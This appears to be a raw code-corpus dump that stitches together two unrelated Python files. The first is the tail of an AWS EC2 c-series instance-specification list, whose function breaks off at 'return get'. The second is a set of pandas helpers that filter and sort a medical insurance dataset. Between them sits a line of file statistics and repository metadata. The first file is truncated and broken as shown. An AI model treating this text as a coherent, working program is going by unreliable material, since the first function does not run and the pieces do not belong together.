'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'SizeInMiB': 196608, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}] # noqa: E501
def get_instances_list() -> list:
'''Returns list EC2 instances with InstanceType = c .'''
# pylint: disable=all
return get
| 9,982.166667 | 119,597 | 0.721887 | 9,998 | 119,786 | 8.637928 | 0.022605 | 0.003937 | 0.056738 | 0.066464 | 0.992995 | 0.992358 | 0.991929 | 0.986429 | 0.985306 | 0.961905 | 0 | 0.059655 | 0.080302 | 119,786 | 11 | 119,598 | 10,889.636364 | 0.724264 | 0.001052 | 0 | 0 | 1 | 0 | 0.653932 | 0.252587 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 12 |
51c8f608028976016618b183ff4902cd493b9653 | 9,224 | py | Python | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | analysis/Manya/scripts/project_functions.py | data301-2020-winter2/course-project-group_1021 | 10813b45eb7a967c610cd9f451928e0365710174 | [
"MIT"
] | null | null | null | import pandas as pd
def load(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
return df
def male_only(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.drop(df[df.Sex == "female"].index)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def female_only(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.drop(df[df.Sex == "male"].index)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def smokers_only(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.drop(df[df.Smoker == "no"].index)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def top50(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = False)
.head(50)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def top10(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = False)
.head(10)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def bot50(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = True)
.head(50)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def bot10(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = True)
.head(10)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def top30male(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = False)
.drop(df[df.Sex == "female"].index)
.head(30)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def top30female(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = False)
.drop(df[df.Sex == "male"].index)
.head(30)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def bot30male(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = True)
.drop(df[df.Sex == "female"].index)
.head(30)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def bot30female(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"children":"Number of Children"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"region":"Place of Residence"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.sort_values(['Medical Insurance Charges'], ascending = True)
.drop(df[df.Sex == "male"].index)
.head(30)
.reset_index()
.drop(['index'], axis=1)
)
return df2
def theory_highest(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.loc[(df['Sex']=='male') &
(df['Age']<=55) &
(df['children']<=2) &
(df['Smoker']=='yes') &
(df['region']=="southeast") &
(df['BMI']>=30)]
.reset_index()
.drop(['index'], axis=1)
.rename(columns={"children":"Number of Children"})
.rename(columns={"region":"Place of Residence"})
)
return df2
def theory_lowest(url_or_path_to_csv_file):
df = (
pd.read_csv(url_or_path_to_csv_file)
.rename(columns={"age":"Age"})
.rename(columns={"sex":"Sex"})
.rename(columns={"bmi":"BMI"})
.rename(columns={"smoker":"Smoker"})
.rename(columns={"charges":"Medical Insurance Charges"})
)
df2 = (
df
.loc[(df['Sex']=='female') &
(df['Age']<=25) &
(df['children']>2) &
(df['Smoker']=='no') &
(df['region']=="southwest") &
(df['BMI']<=25)]
.reset_index()
.drop(['index'], axis=1)
.rename(columns={"children":"Number of Children"})
.rename(columns={"region":"Place of Residence"})
)
return df2
